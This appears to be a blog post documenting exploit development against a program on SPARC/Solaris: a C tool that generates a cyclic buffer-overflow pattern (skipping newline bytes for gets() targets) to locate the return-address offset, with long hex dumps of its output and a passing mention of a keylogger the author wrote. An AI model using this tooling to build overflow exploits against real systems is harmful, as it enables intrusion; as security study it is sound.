Home Asm Pearl — Hacking Apply — pt. IV

Pearl — Hacking Apply — pt. IV

Posted on Posted in Asm, buffer overflow, C, Sparc/Solaris, Uncategorized No Comments

So had previously showed the filling of the buffer with 0x41 but that doesn’t help us locate any offset into the buffer. this will: 

bazz@life[pts/2][~/latest] ./alternating_payload3 1600 > /tmp/sc
bazz@life[pts/2][~/latest] od2sc /tmp/sc
"\x01\x41\x41\x41\x01\x42\x42\x42\x01\x43\x43\x43\x01\x44\x44\x44"
"\x01\x45\x45\x45\x01\x46\x46\x46\x01\x47\x47\x47\x01\x48\x48\x48"
"\x01\x49\x49\x49\x01\x4a\x4a\x4a\x01\x4b\x4b\x4b\x01\x4c\x4c\x4c"
"\x01\x4d\x4d\x4d\x01\x4e\x4e\x4e\x01\x4f\x4f\x4f\x01\x50\x50\x50"
"\x01\x51\x51\x51\x01\x52\x52\x52\x01\x53\x53\x53\x01\x54\x54\x54"
"\x01\x55\x55\x55\x01\x56\x56\x56\x01\x57\x57\x57\x01\x58\x58\x58"
"\x01\x59\x59\x59\x01\x5a\x5a\x5a\x02\x41\x41\x41\x02\x42\x42\x42"
"\x02\x43\x43\x43\x02\x44\x44\x44\x02\x45\x45\x45\x02\x46\x46\x46"
"\x02\x47\x47\x47\x02\x48\x48\x48\x02\x49\x49\x49\x02\x4a\x4a\x4a"
"\x02\x4b\x4b\x4b\x02\x4c\x4c\x4c\x02\x4d\x4d\x4d\x02\x4e\x4e\x4e"
"\x02\x4f\x4f\x4f\x02\x50\x50\x50\x02\x51\x51\x51\x02\x52\x52\x52"
"\x02\x53\x53\x53\x02\x54\x54\x54\x02\x55\x55\x55\x02\x56\x56\x56"
"\x02\x57\x57\x57\x02\x58\x58\x58\x02\x59\x59\x59\x02\x5a\x5a\x5a"
"\x03\x41\x41\x41\x03\x42\x42\x42\x03\x43\x43\x43\x03\x44\x44\x44"
"\x03\x45\x45\x45\x03\x46\x46\x46\x03\x47\x47\x47\x03\x48\x48\x48"
"\x03\x49\x49\x49\x03\x4a\x4a\x4a\x03\x4b\x4b\x4b\x03\x4c\x4c\x4c"
"\x03\x4d\x4d\x4d\x03\x4e\x4e\x4e\x03\x4f\x4f\x4f\x03\x50\x50\x50"
"\x03\x51\x51\x51\x03\x52\x52\x52\x03\x53\x53\x53\x03\x54\x54\x54"
"\x03\x55\x55\x55\x03\x56\x56\x56\x03\x57\x57\x57\x03\x58\x58\x58"
"\x03\x59\x59\x59\x03\x5a\x5a\x5a\x04\x41\x41\x41\x04\x42\x42\x42"
"\x04\x43\x43\x43\x04\x44\x44\x44\x04\x45\x45\x45\x04\x46\x46\x46"
"\x04\x47\x47\x47\x04\x48\x48\x48\x04\x49\x49\x49\x04\x4a\x4a\x4a"
"\x04\x4b\x4b\x4b\x04\x4c\x4c\x4c\x04\x4d\x4d\x4d\x04\x4e\x4e\x4e"
"\x04\x4f\x4f\x4f\x04\x50\x50\x50\x04\x51\x51\x51\x04\x52\x52\x52"
"\x04\x53\x53\x53\x04\x54\x54\x54\x04\x55\x55\x55\x04\x56\x56\x56"
"\x04\x57\x57\x57\x04\x58\x58\x58\x04\x59\x59\x59\x04\x5a\x5a\x5a"
"\x05\x41\x41\x41\x05\x42\x42\x42\x05\x43\x43\x43\x05\x44\x44\x44"
"\x05\x45\x45\x45\x05\x46\x46\x46\x05\x47\x47\x47\x05\x48\x48\x48"
"\x05\x49\x49\x49\x05\x4a\x4a\x4a\x05\x4b\x4b\x4b\x05\x4c\x4c\x4c"
"\x05\x4d\x4d\x4d\x05\x4e\x4e\x4e\x05\x4f\x4f\x4f\x05\x50\x50\x50"
"\x05\x51\x51\x51\x05\x52\x52\x52\x05\x53\x53\x53\x05\x54\x54\x54"
"\x05\x55\x55\x55\x05\x56\x56\x56\x05\x57\x57\x57\x05\x58\x58\x58"
"\x05\x59\x59\x59\x05\x5a\x5a\x5a\x06\x41\x41\x41\x06\x42\x42\x42"
"\x06\x43\x43\x43\x06\x44\x44\x44\x06\x45\x45\x45\x06\x46\x46\x46"
"\x06\x47\x47\x47\x06\x48\x48\x48\x06\x49\x49\x49\x06\x4a\x4a\x4a"
"\x06\x4b\x4b\x4b\x06\x4c\x4c\x4c\x06\x4d\x4d\x4d\x06\x4e\x4e\x4e"
"\x06\x4f\x4f\x4f\x06\x50\x50\x50\x06\x51\x51\x51\x06\x52\x52\x52"
"\x06\x53\x53\x53\x06\x54\x54\x54\x06\x55\x55\x55\x06\x56\x56\x56"
"\x06\x57\x57\x57\x06\x58\x58\x58\x06\x59\x59\x59\x06\x5a\x5a\x5a"
"\x07\x41\x41\x41\x07\x42\x42\x42\x07\x43\x43\x43\x07\x44\x44\x44"
"\x07\x45\x45\x45\x07\x46\x46\x46\x07\x47\x47\x47\x07\x48\x48\x48"
"\x07\x49\x49\x49\x07\x4a\x4a\x4a\x07\x4b\x4b\x4b\x07\x4c\x4c\x4c"
"\x07\x4d\x4d\x4d\x07\x4e\x4e\x4e\x07\x4f\x4f\x4f\x07\x50\x50\x50"
"\x07\x51\x51\x51\x07\x52\x52\x52\x07\x53\x53\x53\x07\x54\x54\x54"
"\x07\x55\x55\x55\x07\x56\x56\x56\x07\x57\x57\x57\x07\x58\x58\x58"
"\x07\x59\x59\x59\x07\x5a\x5a\x5a\x08\x41\x41\x41\x08\x42\x42\x42"
"\x08\x43\x43\x43\x08\x44\x44\x44\x08\x45\x45\x45\x08\x46\x46\x46"
"\x08\x47\x47\x47\x08\x48\x48\x48\x08\x49\x49\x49\x08\x4a\x4a\x4a"
"\x08\x4b\x4b\x4b\x08\x4c\x4c\x4c\x08\x4d\x4d\x4d\x08\x4e\x4e\x4e"
"\x08\x4f\x4f\x4f\x08\x50\x50\x50\x08\x51\x51\x51\x08\x52\x52\x52"
"\x08\x53\x53\x53\x08\x54\x54\x54\x08\x55\x55\x55\x08\x56\x56\x56"
"\x08\x57\x57\x57\x08\x58\x58\x58\x08\x59\x59\x59\x08\x5a\x5a\x5a"
"\x09\x41\x41\x41\x09\x42\x42\x42\x09\x43\x43\x43\x09\x44\x44\x44"
"\x09\x45\x45\x45\x09\x46\x46\x46\x09\x47\x47\x47\x09\x48\x48\x48"
"\x09\x49\x49\x49\x09\x4a\x4a\x4a\x09\x4b\x4b\x4b\x09\x4c\x4c\x4c"
"\x09\x4d\x4d\x4d\x09\x4e\x4e\x4e\x09\x4f\x4f\x4f\x09\x50\x50\x50"
"\x09\x51\x51\x51\x09\x52\x52\x52\x09\x53\x53\x53\x09\x54\x54\x54"
"\x09\x55\x55\x55\x09\x56\x56\x56\x09\x57\x57\x57\x09\x58\x58\x58"
"\x09\x59\x59\x59\x09\x5a\x5a\x5a\x0a\x41\x41\x41\x0a\x42\x42\x42"
"\x0a\x43\x43\x43\x0a\x44\x44\x44\x0a\x45\x45\x45\x0a\x46\x46\x46"
"\x0a\x47\x47\x47\x0a\x48\x48\x48\x0a\x49\x49\x49\x0a\x4a\x4a\x4a"
"\x0a\x4b\x4b\x4b\x0a\x4c\x4c\x4c\x0a\x4d\x4d\x4d\x0a\x4e\x4e\x4e"
"\x0a\x4f\x4f\x4f\x0a\x50\x50\x50\x0a\x51\x51\x51\x0a\x52\x52\x52"
"\x0a\x53\x53\x53\x0a\x54\x54\x54\x0a\x55\x55\x55\x0a\x56\x56\x56"
"\x0a\x57\x57\x57\x0a\x58\x58\x58\x0a\x59\x59\x59\x0a\x5a\x5a\x5a"
"\x0b\x41\x41\x41\x0b\x42\x42\x42\x0b\x43\x43\x43\x0b\x44\x44\x44"
"\x0b\x45\x45\x45\x0b\x46\x46\x46\x0b\x47\x47\x47\x0b\x48\x48\x48"
"\x0b\x49\x49\x49\x0b\x4a\x4a\x4a\x0b\x4b\x4b\x4b\x0b\x4c\x4c\x4c"
"\x0b\x4d\x4d\x4d\x0b\x4e\x4e\x4e\x0b\x4f\x4f\x4f\x0b\x50\x50\x50"
"\x0b\x51\x51\x51\x0b\x52\x52\x52\x0b\x53\x53\x53\x0b\x54\x54\x54"
"\x0b\x55\x55\x55\x0b\x56\x56\x56\x0b\x57\x57\x57\x0b\x58\x58\x58"
"\x0b\x59\x59\x59\x0b\x5a\x5a\x5a\x0c\x41\x41\x41\x0c\x42\x42\x42"
"\x0c\x43\x43\x43\x0c\x44\x44\x44\x0c\x45\x45\x45\x0c\x46\x46\x46"
"\x0c\x47\x47\x47\x0c\x48\x48\x48\x0c\x49\x49\x49\x0c\x4a\x4a\x4a"
"\x0c\x4b\x4b\x4b\x0c\x4c\x4c\x4c\x0c\x4d\x4d\x4d\x0c\x4e\x4e\x4e"
"\x0c\x4f\x4f\x4f\x0c\x50\x50\x50\x0c\x51\x51\x51\x0c\x52\x52\x52"
"\x0c\x53\x53\x53\x0c\x54\x54\x54\x0c\x55\x55\x55\x0c\x56\x56\x56"
"\x0c\x57\x57\x57\x0c\x58\x58\x58\x0c\x59\x59\x59\x0c\x5a\x5a\x5a"
"\x0d\x41\x41\x41\x0d\x42\x42\x42\x0d\x43\x43\x43\x0d\x44\x44\x44"
"\x0d\x45\x45\x45\x0d\x46\x46\x46\x0d\x47\x47\x47\x0d\x48\x48\x48"
"\x0d\x49\x49\x49\x0d\x4a\x4a\x4a\x0d\x4b\x4b\x4b\x0d\x4c\x4c\x4c"
"\x0d\x4d\x4d\x4d\x0d\x4e\x4e\x4e\x0d\x4f\x4f\x4f\x0d\x50\x50\x50"
"\x0d\x51\x51\x51\x0d\x52\x52\x52\x0d\x53\x53\x53\x0d\x54\x54\x54"
"\x0d\x55\x55\x55\x0d\x56\x56\x56\x0d\x57\x57\x57\x0d\x58\x58\x58"
"\x0d\x59\x59\x59\x0d\x5a\x5a\x5a\x0e\x41\x41\x41\x0e\x42\x42\x42"
"\x0e\x43\x43\x43\x0e\x44\x44\x44\x0e\x45\x45\x45\x0e\x46\x46\x46"
"\x0e\x47\x47\x47\x0e\x48\x48\x48\x0e\x49\x49\x49\x0e\x4a\x4a\x4a"
"\x0e\x4b\x4b\x4b\x0e\x4c\x4c\x4c\x0e\x4d\x4d\x4d\x0e\x4e\x4e\x4e"
"\x0e\x4f\x4f\x4f\x0e\x50\x50\x50\x0e\x51\x51\x51\x0e\x52\x52\x52"
"\x0e\x53\x53\x53\x0e\x54\x54\x54\x0e\x55\x55\x55\x0e\x56\x56\x56"
"\x0e\x57\x57\x57\x0e\x58\x58\x58\x0e\x59\x59\x59\x0e\x5a\x5a\x5a"
"\x0f\x41\x41\x41\x0f\x42\x42\x42\x0f\x43\x43\x43\x0f\x44\x44\x44"
"\x0f\x45\x45\x45\x0f\x46\x46\x46\x0f\x47\x47\x47\x0f\x48\x48\x48"
"\x0f\x49\x49\x49\x0f\x4a\x4a\x4a\x0f\x4b\x4b\x4b\x0f\x4c\x4c\x4c"
"\x0f\x4d\x4d\x4d\x0f\x4e\x4e\x4e\x0f\x4f\x4f\x4f\x0f\x50\x50\x50"
"\x0f\x51\x51\x51\x0f\x52\x52\x52\x0f\x53\x53\x53\x0f\x54\x54\x54"
"\x0f\x55\x55\x55\x0f\x56\x56\x56\x0f\x57\x57\x57\x0f\x58\x58\x58"
"\x0f\x59\x59\x59\x0f\x5a\x5a\x5a\x10\x41\x41\x41\x10\x42\x42\x42"
"\x10\x43\x43\x43\x10\x44\x44\x44\x10\x45\x45\x45\x10\x46\x46\x46"
"\x10\x47\x47\x47\x10\x48\x48\x48\x10\x49\x49\x49\x10\x4a\x4a\x4a"

[[[hidden PTY code]]]

That code is stripped from an old version of a userspace keylogger I fabricated.

It wasn’t working… No more buffer overflow.. I realized that my alternating payload program did not take into account the gets() use of 0x0a as the null byte.. so I got to modifying it…

#include <stdio.h>
#include <stdlib.h>

// SPARC uses sys/inttypes.h
#ifdef __sun
  #include <sys/inttypes.h>
#else
  #include <stdint.h>
#endif

// this form provides buffer experimentation foundation
// buffer will be created up to numbytes desired, but < MAX, specified
// on the command line argument
// form: 0x[01-ff][41-5a][41-5a][41-5a]

// 0x41-0x5a range is chars 'A' to 'Z'
// An extended range < 'A' to > 'Z' could modify this program to extend 
//the MAX length of the buffer



#define CHAR_RANGE (('Z'-'A')+1)  // 'Z' - 'A' is 25, but we know 
// there are 26 letters in the alphabet. I call this inclusive subtraction,
// when I add 1 to get the real desired value. There is also inclusive
// addition I think. I'm using terms I created.
// little proof program to figure this out
/* 

#include <stdio.h> 

// Conclusion: Inclusive Subtraction requires add 1

int main()
{
  printf("Derp Face, I'm ready :) \n");
  printf("'Z' - 'A' = %d", ('Z'-'A')+1);

  return 0;
}

*/

#define MAX (CHAR_RANGE * 255 * 4)
// Arbitrary MAX that is derived from the following formula: 
// 26a * 255b * 4c
// a [letters of the alphabet]
// b [ byte field width excluding 0 (null byte)]
// c [ 4 bytes per entry ie. 0x01414141 ]

#define RANGE (26*4)

unsigned long arg, numbytes,smashval;
char no_nl=0;


// does the following operation to get the offset:
// [(msb - 1) * 26] + (lsb - 0x41) 
unsigned long getSmashOffset(const unsigned long *smashval)
{
  uint32_t msb,lsb;

  msb = ( *smashval >> 24 ) & 0xff;
  lsb = *smashval & 0xff;

  msb--;
  if (no_nl && msb > 0x0a) msb--;
  msb *= 26;
  //msb *= 4;
  lsb -= 0x41;

  return (msb+lsb)*4;
}


int processclargs(int argc, char *argv[])
{
  int c, linecount;

  while( --argc > 0 && (*++argv)[0] == '-')
  {
    while(c = *++argv[0]) //bug to investigate: what are the side effects of c == *++argv[0], which was a bug before the fix.
    {
      switch (c) 
      {
        case 'g':   // gets() target must not have 0x0a in payload
          fprintf(stderr,"-g detected, assuming interactive target");
          no_nl=1;
          break;
        default:
          printf("tail: illegal option %c\n", c);
          exit(2);
          break;
      }
    }
  }

  arg = numbytes = strtoul( *argv, (void *)0, 0 );
  fprintf (stderr, "numbytes = %d\n", numbytes);

  ///if( argc != 1)
    //printf("Usage: tail [-n #]\n");
  
    return 0;
}


int main(int argc, char **argv)
{
  char a=0x41;
  char c=1;
  int i, rc=0;
  

  if (argc < 2)
  {
    printf ("You're doing it wrong! \n");
    printf ("Usage: %s [numbytes <= %d]|[smashed-stack-val]\n", argv[0], MAX);
    exit (1);
  }


  //arg = numbytes = strtoul( argv[1], (void *)0, 0 );

  processclargs(argc,argv);

  

  if (arg > MAX)
  {
    if (arg < 0x01414141)
    {
      printf ("You can't have an overflow amount > %d\n", MAX);
      exit(2);
    } 
    else
    {
      printf ("%lu\n", getSmashOffset(&arg));
      return 0;
    }
  }
  int tag;
  for (a=0x40,i=0,c=1,tag=1; i < (numbytes); i++)
  {
    //    if (!rc)
    if (i%4 == 0)
    {
      tag = !tag;
	  printf("%c", c);
      //if (tag == 1)
      //{
        a++; 
        if (a == 'Z'+1)
          a = 0x41;
      //}
    }
    else
      printf("%c",a);
    //  else printf("%c%c%c%c", a,a,a,a);
    rc ++; //+= 4;
    if (rc == RANGE)
    {
      rc=0; c++;
      if (!c)
        c++;
      else if (c == 0x0a && no_nl)
        c++;
    }
  }
  //printf("%c",'\0');
  return 0;
}

I inspect the new invokation for working correctly

bazz@life[pts/2][~/latest] ./alternating_payload3 -g 1600 | od -X
-g detected, assuming interactive targetnumbytes = 1600
0000000 01414141 01424242 01434343 01444444
0000020 01454545 01464646 01474747 01484848
0000040 01494949 014a4a4a 014b4b4b 014c4c4c
0000060 014d4d4d 014e4e4e 014f4f4f 01505050
0000100 01515151 01525252 01535353 01545454
0000120 01555555 01565656 01575757 01585858
0000140 01595959 015a5a5a 02414141 02424242
0000160 02434343 02444444 02454545 02464646
0000200 02474747 02484848 02494949 024a4a4a
0000220 024b4b4b 024c4c4c 024d4d4d 024e4e4e
0000240 024f4f4f 02505050 02515151 02525252
0000260 02535353 02545454 02555555 02565656
0000300 02575757 02585858 02595959 025a5a5a
0000320 03414141 03424242 03434343 03444444
0000340 03454545 03464646 03474747 03484848
0000360 03494949 034a4a4a 034b4b4b 034c4c4c
0000400 034d4d4d 034e4e4e 034f4f4f 03505050
0000420 03515151 03525252 03535353 03545454
0000440 03555555 03565656 03575757 03585858
0000460 03595959 035a5a5a 04414141 04424242
0000500 04434343 04444444 04454545 04464646
0000520 04474747 04484848 04494949 044a4a4a
0000540 044b4b4b 044c4c4c 044d4d4d 044e4e4e
0000560 044f4f4f 04505050 04515151 04525252
0000600 04535353 04545454 04555555 04565656
0000620 04575757 04585858 04595959 045a5a5a
0000640 05414141 05424242 05434343 05444444
0000660 05454545 05464646 05474747 05484848
0000700 05494949 054a4a4a 054b4b4b 054c4c4c
0000720 054d4d4d 054e4e4e 054f4f4f 05505050
0000740 05515151 05525252 05535353 05545454
0000760 05555555 05565656 05575757 05585858
0001000 05595959 055a5a5a 06414141 06424242
0001020 06434343 06444444 06454545 06464646
0001040 06474747 06484848 06494949 064a4a4a
0001060 064b4b4b 064c4c4c 064d4d4d 064e4e4e
0001100 064f4f4f 06505050 06515151 06525252
0001120 06535353 06545454 06555555 06565656
0001140 06575757 06585858 06595959 065a5a5a
0001160 07414141 07424242 07434343 07444444
0001200 07454545 07464646 07474747 07484848
0001220 07494949 074a4a4a 074b4b4b 074c4c4c
0001240 074d4d4d 074e4e4e 074f4f4f 07505050
0001260 07515151 07525252 07535353 07545454
0001300 07555555 07565656 07575757 07585858
0001320 07595959 075a5a5a 08414141 08424242
0001340 08434343 08444444 08454545 08464646
0001360 08474747 08484848 08494949 084a4a4a
0001400 084b4b4b 084c4c4c 084d4d4d 084e4e4e
0001420 084f4f4f 08505050 08515151 08525252
0001440 08535353 08545454 08555555 08565656
0001460 08575757 08585858 08595959 085a5a5a
0001500 09414141 09424242 09434343 09444444
0001520 09454545 09464646 09474747 09484848
0001540 09494949 094a4a4a 094b4b4b 094c4c4c
0001560 094d4d4d 094e4e4e 094f4f4f 09505050
0001600 09515151 09525252 09535353 09545454
0001620 09555555 09565656 09575757 09585858
0001640 09595959 095a5a5a 0b414141 0b424242
0001660 0b434343 0b444444 0b454545 0b464646
0001700 0b474747 0b484848 0b494949 0b4a4a4a
0001720 0b4b4b4b 0b4c4c4c 0b4d4d4d 0b4e4e4e
0001740 0b4f4f4f 0b505050 0b515151 0b525252
0001760 0b535353 0b545454 0b555555 0b565656
0002000 0b575757 0b585858 0b595959 0b5a5a5a
0002020 0c414141 0c424242 0c434343 0c444444
0002040 0c454545 0c464646 0c474747 0c484848
0002060 0c494949 0c4a4a4a 0c4b4b4b 0c4c4c4c
0002100 0c4d4d4d 0c4e4e4e 0c4f4f4f 0c505050
0002120 0c515151 0c525252 0c535353 0c545454
0002140 0c555555 0c565656 0c575757 0c585858
0002160 0c595959 0c5a5a5a 0d414141 0d424242
0002200 0d434343 0d444444 0d454545 0d464646
0002220 0d474747 0d484848 0d494949 0d4a4a4a
0002240 0d4b4b4b 0d4c4c4c 0d4d4d4d 0d4e4e4e
0002260 0d4f4f4f 0d505050 0d515151 0d525252
0002300 0d535353 0d545454 0d555555 0d565656
0002320 0d575757 0d585858 0d595959 0d5a5a5a
0002340 0e414141 0e424242 0e434343 0e444444
0002360 0e454545 0e464646 0e474747 0e484848
0002400 0e494949 0e4a4a4a 0e4b4b4b 0e4c4c4c
0002420 0e4d4d4d 0e4e4e4e 0e4f4f4f 0e505050
0002440 0e515151 0e525252 0e535353 0e545454
0002460 0e555555 0e565656 0e575757 0e585858
0002500 0e595959 0e5a5a5a 0f414141 0f424242
0002520 0f434343 0f444444 0f454545 0f464646
0002540 0f474747 0f484848 0f494949 0f4a4a4a
0002560 0f4b4b4b 0f4c4c4c 0f4d4d4d 0f4e4e4e
0002600 0f4f4f4f 0f505050 0f515151 0f525252
0002620 0f535353 0f545454 0f555555 0f565656
0002640 0f575757 0f585858 0f595959 0f5a5a5a
0002660 10414141 10424242 10434343 10444444
0002700 10454545 10464646 10474747 10484848
0002720 10494949 104a4a4a 104b4b4b 104c4c4c
0002740 104d4d4d 104e4e4e 104f4f4f 10505050
0002760 10515151 10525252 10535353 10545454
0003000 10555555 10565656 10575757 10585858
0003020 10595959 105a5a5a 11414141 11424242
0003040 11434343 11444444 11454545 11464646
0003060 11474747 11484848 11494949 114a4a4a
0003100

notice we skip the 0x0a prefix byte

bazz@life[pts/2][~/latest] ./alternating_payload3 -g 1600 > /tmp/X; od2sc /tmp/X
-g detected, assuming interactive targetnumbytes = 1600
"\x01\x41\x41\x41\x01\x42\x42\x42\x01\x43\x43\x43\x01\x44\x44\x44"
"\x01\x45\x45\x45\x01\x46\x46\x46\x01\x47\x47\x47\x01\x48\x48\x48"
"\x01\x49\x49\x49\x01\x4a\x4a\x4a\x01\x4b\x4b\x4b\x01\x4c\x4c\x4c"
"\x01\x4d\x4d\x4d\x01\x4e\x4e\x4e\x01\x4f\x4f\x4f\x01\x50\x50\x50"
"\x01\x51\x51\x51\x01\x52\x52\x52\x01\x53\x53\x53\x01\x54\x54\x54"
"\x01\x55\x55\x55\x01\x56\x56\x56\x01\x57\x57\x57\x01\x58\x58\x58"
"\x01\x59\x59\x59\x01\x5a\x5a\x5a\x02\x41\x41\x41\x02\x42\x42\x42"
"\x02\x43\x43\x43\x02\x44\x44\x44\x02\x45\x45\x45\x02\x46\x46\x46"
"\x02\x47\x47\x47\x02\x48\x48\x48\x02\x49\x49\x49\x02\x4a\x4a\x4a"
"\x02\x4b\x4b\x4b\x02\x4c\x4c\x4c\x02\x4d\x4d\x4d\x02\x4e\x4e\x4e"
"\x02\x4f\x4f\x4f\x02\x50\x50\x50\x02\x51\x51\x51\x02\x52\x52\x52"
"\x02\x53\x53\x53\x02\x54\x54\x54\x02\x55\x55\x55\x02\x56\x56\x56"
"\x02\x57\x57\x57\x02\x58\x58\x58\x02\x59\x59\x59\x02\x5a\x5a\x5a"
"\x03\x41\x41\x41\x03\x42\x42\x42\x03\x43\x43\x43\x03\x44\x44\x44"
"\x03\x45\x45\x45\x03\x46\x46\x46\x03\x47\x47\x47\x03\x48\x48\x48"
"\x03\x49\x49\x49\x03\x4a\x4a\x4a\x03\x4b\x4b\x4b\x03\x4c\x4c\x4c"
"\x03\x4d\x4d\x4d\x03\x4e\x4e\x4e\x03\x4f\x4f\x4f\x03\x50\x50\x50"
"\x03\x51\x51\x51\x03\x52\x52\x52\x03\x53\x53\x53\x03\x54\x54\x54"
"\x03\x55\x55\x55\x03\x56\x56\x56\x03\x57\x57\x57\x03\x58\x58\x58"
"\x03\x59\x59\x59\x03\x5a\x5a\x5a\x04\x41\x41\x41\x04\x42\x42\x42"
"\x04\x43\x43\x43\x04\x44\x44\x44\x04\x45\x45\x45\x04\x46\x46\x46"
"\x04\x47\x47\x47\x04\x48\x48\x48\x04\x49\x49\x49\x04\x4a\x4a\x4a"
"\x04\x4b\x4b\x4b\x04\x4c\x4c\x4c\x04\x4d\x4d\x4d\x04\x4e\x4e\x4e"
"\x04\x4f\x4f\x4f\x04\x50\x50\x50\x04\x51\x51\x51\x04\x52\x52\x52"
"\x04\x53\x53\x53\x04\x54\x54\x54\x04\x55\x55\x55\x04\x56\x56\x56"
"\x04\x57\x57\x57\x04\x58\x58\x58\x04\x59\x59\x59\x04\x5a\x5a\x5a"
"\x05\x41\x41\x41\x05\x42\x42\x42\x05\x43\x43\x43\x05\x44\x44\x44"
"\x05\x45\x45\x45\x05\x46\x46\x46\x05\x47\x47\x47\x05\x48\x48\x48"
"\x05\x49\x49\x49\x05\x4a\x4a\x4a\x05\x4b\x4b\x4b\x05\x4c\x4c\x4c"
"\x05\x4d\x4d\x4d\x05\x4e\x4e\x4e\x05\x4f\x4f\x4f\x05\x50\x50\x50"
"\x05\x51\x51\x51\x05\x52\x52\x52\x05\x53\x53\x53\x05\x54\x54\x54"
"\x05\x55\x55\x55\x05\x56\x56\x56\x05\x57\x57\x57\x05\x58\x58\x58"
"\x05\x59\x59\x59\x05\x5a\x5a\x5a\x06\x41\x41\x41\x06\x42\x42\x42"
"\x06\x43\x43\x43\x06\x44\x44\x44\x06\x45\x45\x45\x06\x46\x46\x46"
"\x06\x47\x47\x47\x06\x48\x48\x48\x06\x49\x49\x49\x06\x4a\x4a\x4a"
"\x06\x4b\x4b\x4b\x06\x4c\x4c\x4c\x06\x4d\x4d\x4d\x06\x4e\x4e\x4e"
"\x06\x4f\x4f\x4f\x06\x50\x50\x50\x06\x51\x51\x51\x06\x52\x52\x52"
"\x06\x53\x53\x53\x06\x54\x54\x54\x06\x55\x55\x55\x06\x56\x56\x56"
"\x06\x57\x57\x57\x06\x58\x58\x58\x06\x59\x59\x59\x06\x5a\x5a\x5a"
"\x07\x41\x41\x41\x07\x42\x42\x42\x07\x43\x43\x43\x07\x44\x44\x44"
"\x07\x45\x45\x45\x07\x46\x46\x46\x07\x47\x47\x47\x07\x48\x48\x48"
"\x07\x49\x49\x49\x07\x4a\x4a\x4a\x07\x4b\x4b\x4b\x07\x4c\x4c\x4c"
"\x07\x4d\x4d\x4d\x07\x4e\x4e\x4e\x07\x4f\x4f\x4f\x07\x50\x50\x50"
"\x07\x51\x51\x51\x07\x52\x52\x52\x07\x53\x53\x53\x07\x54\x54\x54"
"\x07\x55\x55\x55\x07\x56\x56\x56\x07\x57\x57\x57\x07\x58\x58\x58"
"\x07\x59\x59\x59\x07\x5a\x5a\x5a\x08\x41\x41\x41\x08\x42\x42\x42"
"\x08\x43\x43\x43\x08\x44\x44\x44\x08\x45\x45\x45\x08\x46\x46\x46"
"\x08\x47\x47\x47\x08\x48\x48\x48\x08\x49\x49\x49\x08\x4a\x4a\x4a"
"\x08\x4b\x4b\x4b\x08\x4c\x4c\x4c\x08\x4d\x4d\x4d\x08\x4e\x4e\x4e"
"\x08\x4f\x4f\x4f\x08\x50\x50\x50\x08\x51\x51\x51\x08\x52\x52\x52"
"\x08\x53\x53\x53\x08\x54\x54\x54\x08\x55\x55\x55\x08\x56\x56\x56"
"\x08\x57\x57\x57\x08\x58\x58\x58\x08\x59\x59\x59\x08\x5a\x5a\x5a"
"\x09\x41\x41\x41\x09\x42\x42\x42\x09\x43\x43\x43\x09\x44\x44\x44"
"\x09\x45\x45\x45\x09\x46\x46\x46\x09\x47\x47\x47\x09\x48\x48\x48"
"\x09\x49\x49\x49\x09\x4a\x4a\x4a\x09\x4b\x4b\x4b\x09\x4c\x4c\x4c"
"\x09\x4d\x4d\x4d\x09\x4e\x4e\x4e\x09\x4f\x4f\x4f\x09\x50\x50\x50"
"\x09\x51\x51\x51\x09\x52\x52\x52\x09\x53\x53\x53\x09\x54\x54\x54"
"\x09\x55\x55\x55\x09\x56\x56\x56\x09\x57\x57\x57\x09\x58\x58\x58"
"\x09\x59\x59\x59\x09\x5a\x5a\x5a\x0b\x41\x41\x41\x0b\x42\x42\x42"
"\x0b\x43\x43\x43\x0b\x44\x44\x44\x0b\x45\x45\x45\x0b\x46\x46\x46"
"\x0b\x47\x47\x47\x0b\x48\x48\x48\x0b\x49\x49\x49\x0b\x4a\x4a\x4a"
"\x0b\x4b\x4b\x4b\x0b\x4c\x4c\x4c\x0b\x4d\x4d\x4d\x0b\x4e\x4e\x4e"
"\x0b\x4f\x4f\x4f\x0b\x50\x50\x50\x0b\x51\x51\x51\x0b\x52\x52\x52"
"\x0b\x53\x53\x53\x0b\x54\x54\x54\x0b\x55\x55\x55\x0b\x56\x56\x56"
"\x0b\x57\x57\x57\x0b\x58\x58\x58\x0b\x59\x59\x59\x0b\x5a\x5a\x5a"
"\x0c\x41\x41\x41\x0c\x42\x42\x42\x0c\x43\x43\x43\x0c\x44\x44\x44"
"\x0c\x45\x45\x45\x0c\x46\x46\x46\x0c\x47\x47\x47\x0c\x48\x48\x48"
"\x0c\x49\x49\x49\x0c\x4a\x4a\x4a\x0c\x4b\x4b\x4b\x0c\x4c\x4c\x4c"
"\x0c\x4d\x4d\x4d\x0c\x4e\x4e\x4e\x0c\x4f\x4f\x4f\x0c\x50\x50\x50"
"\x0c\x51\x51\x51\x0c\x52\x52\x52\x0c\x53\x53\x53\x0c\x54\x54\x54"
"\x0c\x55\x55\x55\x0c\x56\x56\x56\x0c\x57\x57\x57\x0c\x58\x58\x58"
"\x0c\x59\x59\x59\x0c\x5a\x5a\x5a\x0d\x41\x41\x41\x0d\x42\x42\x42"
"\x0d\x43\x43\x43\x0d\x44\x44\x44\x0d\x45\x45\x45\x0d\x46\x46\x46"
"\x0d\x47\x47\x47\x0d\x48\x48\x48\x0d\x49\x49\x49\x0d\x4a\x4a\x4a"
"\x0d\x4b\x4b\x4b\x0d\x4c\x4c\x4c\x0d\x4d\x4d\x4d\x0d\x4e\x4e\x4e"
"\x0d\x4f\x4f\x4f\x0d\x50\x50\x50\x0d\x51\x51\x51\x0d\x52\x52\x52"
"\x0d\x53\x53\x53\x0d\x54\x54\x54\x0d\x55\x55\x55\x0d\x56\x56\x56"
"\x0d\x57\x57\x57\x0d\x58\x58\x58\x0d\x59\x59\x59\x0d\x5a\x5a\x5a"
"\x0e\x41\x41\x41\x0e\x42\x42\x42\x0e\x43\x43\x43\x0e\x44\x44\x44"
"\x0e\x45\x45\x45\x0e\x46\x46\x46\x0e\x47\x47\x47\x0e\x48\x48\x48"
"\x0e\x49\x49\x49\x0e\x4a\x4a\x4a\x0e\x4b\x4b\x4b\x0e\x4c\x4c\x4c"
"\x0e\x4d\x4d\x4d\x0e\x4e\x4e\x4e\x0e\x4f\x4f\x4f\x0e\x50\x50\x50"
"\x0e\x51\x51\x51\x0e\x52\x52\x52\x0e\x53\x53\x53\x0e\x54\x54\x54"
"\x0e\x55\x55\x55\x0e\x56\x56\x56\x0e\x57\x57\x57\x0e\x58\x58\x58"
"\x0e\x59\x59\x59\x0e\x5a\x5a\x5a\x0f\x41\x41\x41\x0f\x42\x42\x42"
"\x0f\x43\x43\x43\x0f\x44\x44\x44\x0f\x45\x45\x45\x0f\x46\x46\x46"
